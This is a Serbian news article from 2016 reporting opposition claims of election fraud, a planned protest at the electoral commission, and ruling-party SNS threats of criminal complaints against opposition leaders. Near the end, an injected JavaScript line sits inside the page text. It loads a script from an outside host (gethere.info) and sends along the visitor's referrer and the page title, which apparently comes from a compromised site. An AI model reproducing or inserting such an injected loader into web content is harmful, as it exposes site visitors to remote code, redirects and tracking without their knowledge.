Politika
29.04.2016. 13:52
ekspres

IZBORI: Opozicija zove na protest, SNS najavljuje krivične prijave

Ekspres.net
Izvor: Ekspres.net

 Predsednik Demokratske stranke Bojan Pajtić pozvao je danas članove i simpatizere da na ponovljenim izborima na 15 biračkih mesta glasaju za listu DSS i Dveri

Lideri opozicije su pozvali građane na protest ispred RIK u subotu u 13 časova, a SNS je  najvila podnošenje krivičnih prijava protiv lidera opozicije zbog "pokušaja manipulacije izbornim procesom".

Pajtić pozvao Vuka, Ljajića i Velju na protest

Predsednik Demokratske stranke Bojan Pajtić pozvao je danas članove i simpatizere da na ponovljenim izborima na 15 biračkih mesta, 4. maja, glasaju za listu DSS i Dveri. On je, na vanrednoj konferenciji za novinare četiri opozicione liste, rekao da će se DS boriti da bude ispoštovano svačije pravo i svačiji glas.

On je najavio protest sutra ispred RIK-a i pozvao i Vuka Draškovića, Rasima Ljajića i Velimira Ilića, ljude sa kojima se DS, kako je rekao, devedesetih borila protiv krađe na izborima, da se pridruže protestu.

Naveo je da se u političkom i programskom smislu DS u mnogo čemu ne slaže sa DSS i Dverima, ali da zbog principa demokratije poziva članove DS da na 15 biračkih mesta podrze listu DSS-Dveri.

"Ta lista se ne može naći ispod cenzusa". rekao je Pajtić i dodao da bi to bio poraz demokratije i slobode i "pobeda diktatorskog režima".

Pajtić i predsednica DSS Sanda Rašković Ivić tvrde da je na izborima "ukradeno 300. 000 glasova" na različite načine.

Opozicija je najavila da o svemu obavestiti međunarodne organizacije, a lider pokreta Dosta je bilo Saša Radulović je rekao da je bilo "očigledno da se na sramnim sednicama RIK" sve vreme obarala jedna lista - Dveri-DSS.

Radulović je ponovio da DJB ima dokaze o "izbornim mahinacijama" i da je uveren da će SNS imati problem da sastavi vladu, a da ta vlada neće trajati mnogo duže od godinu dana", rekao je on.

Po završetku sednice RIK-a, gde su proglašeni rezultati izbora sa 99,82 odsto obrađenih biračkih mesta,došlo je do incidenta kada su predstavnici pokreta Dveri verbalno napali predsednika RIK-a Dejana Đurđevića i direktora Republičkog zavoda za statistiku Miladina Kovačevića.

Martinović(SNS): Podnosimo prijave protiv lidera opozicije

Predsednica DŠ Sanda Rašković Ivić rekla je da je Republička izborna komisija "produžena ruka i operativac SNS".

Konferenciji za novinare prisustvovali su predsednik pokreta Dveri Boško Obradović, predsednica DSS Sandra Rašković Ivić, predsednik pokreta Dosta je bilo Saša Radulović i predstavnici SDS i LDP.

Visoki funkcioner SNS Aleksandar Martinović  je na konferenciji za novinare u sedištu naprednjaka najavio fda će zbog "pokušaja manipulacije izbornim procesom" podneti krivične prijave  protiv lidera DS, DSS, Dveri i pokreta Dosta je bilo Bojana Pajtića, Sande Rašković Ivić, Boška Obradovića i Saše Radulovića.

 s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
8°C
27.04.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve